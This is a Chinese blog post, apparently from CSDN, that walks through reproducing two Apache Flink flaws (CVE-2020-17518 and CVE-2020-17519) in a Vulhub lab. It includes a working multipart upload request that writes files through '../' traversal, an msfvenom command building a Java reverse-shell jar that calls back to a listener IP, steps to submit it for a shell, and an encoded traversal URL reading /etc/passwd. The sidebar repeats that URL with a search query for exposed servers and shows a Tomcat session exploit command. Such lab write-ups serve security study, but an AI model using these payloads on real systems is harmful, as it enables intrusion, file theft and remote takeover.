[Vulhub] Apache Flink 目录遍历漏洞

最新推荐文章于 2023-08-31 13:48:15 发布
最新推荐文章于 2023-08-31 13:48:15 发布
阅读量576 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: flink 安全漏洞 渗透测试 apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45605352/article/details/118891302
版权

文章目录

Apache Flink 任意文件上传漏洞 (CVE-2020-17518)

0x00 漏洞描述

Apache Flink 是一个开源的流处理框架,具有强大的流处理和批处理能力。

Apache Flink 1.5.1 引入了 REST 处理程序,允许您通过恶意修改的 HTTP HEADER 将上传的文件写入本地文件系统上的任意位置。

0x01 影响版本

Apache Flink:1.11.2-1.5.1

0x02 靶场环境

Apache Flink jobmanager 1.11.2:https://vulhub.org/#/environments/flink/CVE-2020-17518/

0x03 漏洞分析

触发点在 org.apache.flink.runtime.rest.FileUploadHandler#channelRead0 ,上传时先获取filename,之后resolve()解析方法接收filename(用户可控),与系统路径拼接,dest存储拼接后上传路径,传给fileUpload.renameTo()方法,上传文件,并重命名保存至另一个路径以做缓存,这个路径用户也可控,缓存文件存在时间很短,只有30s,此时系统按目标路径写入文件。

新版本修复也是将org.apache.flink.runtime.rest.FileUploadHandler#channelRead0() 对传入的filename进行截断,只取末尾的文件名,传递的../ 和目录名均被忽略

漏洞分析:https://paper.seebug.org/1505/

0x04 漏洞复现

Apache Flink 启动后,访问http://your-ip:8081查看主页:
在这里插入图片描述
构造poc请求包如下:

POST /jars/upload HTTP/1.1
Host: localhost:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 187

------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success"

success
	
------WebKitFormBoundaryoZ8meKnrrso89R6Y--

在这里插入图片描述
进入容器中查看,文件已经创建成功:
在这里插入图片描述

0x05 反弹shell

由于 flink 本身是没有鉴权的,并且它本身支持任意jar包上传并执行,所以可以通过上传jar包getshell。

生成 jar 格式的马:

msfvenom -p java/shell_reverse_tcp lhost=10.11.34.231 lport=12581 -f jar > 1,jar

在这里插入图片描述
msf 设置监听:
在这里插入图片描述
将 jar 包上传后点击上传的包然后点击 Submit 执行:
在这里插入图片描述
获得反弹 shell:
在这里插入图片描述

Apache Flink 任意文件读取漏洞 (CVE-2020-17519)

0x00 漏洞描述

Apache Flink 1.11.0 中引入的更改(以及在 1.11.1 和 1.11.2 中发布)允许攻击者通过 JobManager 进程的 REST 接口读取 JobManager 本地文件系统上的任何文件。

0x01 影响版本

Apache Flink:1.11.0, 1.11.1, 1.11.2

0x02 靶场环境

Apache Flink jobmanager 1.11.2:https://vulhub.org/#/environments/flink/CVE-2020-17519/

0x03 漏洞分析

任意读过程中的进行了两次 url 解码,第一次解码产生了pathpathParams 存放再次解码的结果 ,将HandlerRequest传递给org.apache.flink.runtime.rest.handler.cluster.JobManagerCustomLogHandler#getFile,获取pathParams中存放的filename,拼接logDir返回路径。

补丁也是通过File.getName()只取默认文件名,路径中的…/和目录名都被忽略,filename只剩下了文件名

漏洞分析:https://paper.seebug.org/1505/

0x04 漏洞复现

访问:

http://127.0.0.1:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

在这里插入图片描述

参考链接:https://paper.seebug.org/1505/

yAnd0n9
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
apache flink目录漏洞(CVE-2020-17518复现)
ANYOUZHEN的博客
06-04 1301
漏洞描述:apache Flink目录漏洞,可通过REST API读/写远程文件影响版本:Flink 1.5.1-1.11.2接下来开始复现:我们通过vulhub进行复现打开vulhub上的flink里的cve-2020-17518使用docker-compose配置相关环境:(在靶场cve-2020-17518使用下面的指令) 然后输入kali密码即可成功启动环境接下来我们查看当前环境:在靶场终端输入: 但是在我的kali2022上面出现了报错:8行,和上一篇文章出现了一样的问题,上网搜
VULFOCUS靶场(vulfocus/twonkyserver-cve_2018_7171:latest )
qq_44122254的博客
09-02 509
vulfocus/twonkyserver-cve_2018_7171:latest
CVE-2020-9484
04-13
CVE-2020-9484(Tomcat) 仅用于教育目的。 有关详细信息,请参见参考。 跑步 $ git clone https://github.com/masahiro331/CVE-2020-9484.git $ cd CVE-2020-9484 $ docker build -t tomcat:groovy . $ docker run -d -p 8080:8080 tomcat:groovy 开发 $ curl 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy' 查看 $ docker exec -it $CONTAINER /bin/sh $ ls /tmp/rce
Tomcat Session(CVE-2020-9484)反序列化漏洞复现
热门推荐
qq_40898302的博客
04-20 1万+
一、漏洞介绍 北京时间2020年05月20日,Apache官方发布了 Apache Tomcat 远程代码执行 的风险通告,该漏洞编号为 CVE-2020-9484。 Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。当Tomcat使用了自带session同步功能时,使用不安全的配置(没有使用EncryptInterceptor)会存在反序列化漏洞,攻击者通过精心构造的数据包, 可以对使用了自带session同步功...
Apache Flink jobmanager 目录漏洞
weixin_46801402的博客
11-02 544
Apache Flink jobmanager 目录漏洞
CVE-2020-9484 Apache Tomcat Remote Code Execution via session persistence
lefooter的博客
05-21 1545
版权声明:本文为CSDN博主「隐形人真忙」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。 原文链接:https://blog.csdn.net/u011721501/article/details/88637270 近楼主也没有其他的时间来做漏洞研究了,读者们可以从本博上次更新的时间就可以看出来=_,=。 但是为了一直关注本楼主的朋友们,我决定拿出两年前的一个存货(其实是辣鸡洞)分享,诚意满满(大雾)。 以下是正文: ————————————————————.
tomcat源码分析_CVE-2020-9484 tomcat session反序列化漏洞分析
weixin_39839162的博客
11-27 202
作者:N1gh5合天智汇title: CVE-2020-9484 tomcat session反序列化漏洞分析 tags: CVE,Tomcat,反序列化 grammar_cjkRuby: true本文借助CVE-2020-9484 Tomcat漏洞详细的介绍了本地和远程调试Tomcat 源码。分析漏洞成因以及补丁修补情况,以及分析ysoserial反序列化链。0x01 漏洞简介Apache To...
Apache Flink目录(CVE-2020-17519)批量检测脚本
09-24
2021年1月5日,Apache Flink官方发布安全更新,修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞漏洞之一就是Apache Flink目录漏洞(CVE-2020-17519)。 Flink核心是一个流式的数据流执行引擎,其针对数据流的...
CVE-2020-17519:Apache Flink 目录漏洞批量检测 (CVE-2020-17519)
05-30
该脚本为Apache Flink 目录漏洞批量检测 (CVE-2020-17519)。 使用方法:Python CVE-2020-17519.py urls.txt urls.txt 中每个url为一行,漏洞地址输出在vul.txt中 影响版本: Apache Flink 1.11.0、1.11.1、...
Apache Flink目录(CVE-2020-17519)单目标检测工具
09-24
2021年1月5日,Apache Flink官方发布安全更新,修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞漏洞之一就是Apache Flink目录漏洞(CVE-2020-17519)。 Flink核心是一个流式的数据流执行引擎,其针对数据流的...
apache漏洞汇总apache漏洞汇总
03-29
Apache-flink 未授权访问任意jar包上传反弹shell CVE-2019-0193 Apache-Solr via Velocity template RCE CVE-2019-17564 Apache-Dubbo反序列化漏洞 CVE-2020-13925 Apache Kylin 远程命令执行漏洞 CVE-2020-13957 ...
Apache Flink 目录漏洞 CVE-2020-17519
最新发布
m0_54323635的博客
08-31 413
2021年01月06日,360CERT监测发现Apache Flink发布了Apache Flink 目录穿越漏洞的风险通告,漏洞编号为CVE-2020-17518,CVE-2020-17519,漏洞等级:高危,漏洞评分:8.5。Apache Flink 1.11.0 中引入的一项更改(也在 1.11.1 和 1.11.2 中发布)允许攻击者通过 JobManager 进程的 REST 接口读取 JobManager 本地文件系统上的任何文件。
CVE-2020-9484 (Tomcat cluster sync-session)复现
thelostworld
08-20 1281
​CVE-2020-9484 一、漏洞简介 对于一个企业级应用而言,Session对象的管理十分重要。Sessio对象的信息一般情况下置于服务器的内存中,当服务器由于故障重启,或应用重新加载 时候,此时的Session信息将全部丢失。为了避免这样的情况,在某些场合可以将服务器的Session数据存放在文件系统或数据库中,这样的操作称为 Session对象的持久化。Session对象在持久化时,存放在其中的对象以序列化的形式存放,这就是为什么一般存放在Session中的数据需要实 现可序...
Apache Flink目录漏洞
ITgougou_的博客
01-07 317
fofa语法搜索app="Apache-Flink" poc: http://IP:PORT/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd 读取成功
CVE-2020-9484 Tomcat Session 反序列化复现
weixin_45260839的博客
07-01 1702
CVE-2020-9484 Tomcat Session 反序列化复现
Apache Flink 目录
自强不息
05-05 237
​我举手向苍穹,并非一定要摘星取月,我只是需要这个向上的、永不臣服的姿态。
apache目录漏洞利用_Apache Flink 目录漏洞(CVE-2020-17518)WINDOWS 环境复现
weixin_42300090的博客
02-15 500
Apache Flink目录漏洞复现(CVE-2020-17518)1.漏洞复现1.1漏洞背景Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。近日 Apache官网发布了Apache Flink目录漏洞(...
[Vulhub] Weblogic SSRF 漏洞(CVE-2014-4210)
weixin_45605352的博客
07-21 5400
0x00 预备知识 01 SSRF概念: SSRF(服务端请求伪造),指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。 简单的说就是利用一个可发起网络请求的服务当作跳板来攻击其他服务 02 SSRF原理 SSRF的实质是利用存在缺陷的web应用作为代理攻击远程和本地的服务器。一般情况下, SSRF攻击的目标是外网无法访问的内部系统,黑客可以利用SSRF漏洞获取内部系统的一些信息(正是因为它是由服务端
apache flink文件上传漏洞修复
05-20
Apache Flink是一个分布式流处理框架,从版本1.0.0到1.4.0存在文件上传漏洞,攻击者可以通过该漏洞上传恶意文件并在服务器上执行任意代码,造成严重的安全风险。以下是修复该漏洞的步骤: 1.升级Apache Flink版本至1.4.1及以上版本,因为该版本已经修复了文件上传漏洞。 2.移除flink-runtime-web模块,因为该模块是漏洞的根源。可以通过修改pom.xml文件中的依赖关系来实现该操作。 3.禁用Flink的Web UI界面,因为该界面是攻击者上传恶意文件的入口。可以通过修改conf/flink-conf.yaml文件中的配置来实现该操作,具体内容如下: ``` #disable flink web ui web.submit.enable: false ``` 4.限制Flink集群的访问权限,防止未授权的用户上传恶意文件。可以通过修改conf/flink-conf.yaml文件中的配置来实现该操作,具体内容如下: ``` #set flink rest api host and port rest.address: 127.0.0.1 rest.port: 8081 #set flink jobmanager rpc address and port jobmanager.rpc.address: 127.0.0.1 jobmanager.rpc.port: 6123 ``` 以上是修复Apache Flink文件上传漏洞的步骤,建议尽快采取措施以保证系统安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值